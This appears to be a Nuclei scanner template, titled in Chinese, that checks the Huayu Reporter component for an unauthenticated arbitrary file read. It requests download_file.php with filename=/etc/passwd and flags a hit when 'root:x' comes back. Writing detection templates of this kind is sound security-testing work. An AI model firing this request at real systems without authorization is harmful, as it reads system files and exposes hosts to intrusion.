id: huayu-Reporter-fileRead

info:
  name: 华域Reporter组件download_file.php文件filename参数前台任意文件读取
  author: Str1am
  severity: high
  tags: Reporter,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/view/action/download_file.php?filename=/etc/passwd&savename=query.xls"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
        part: body
        condition: and
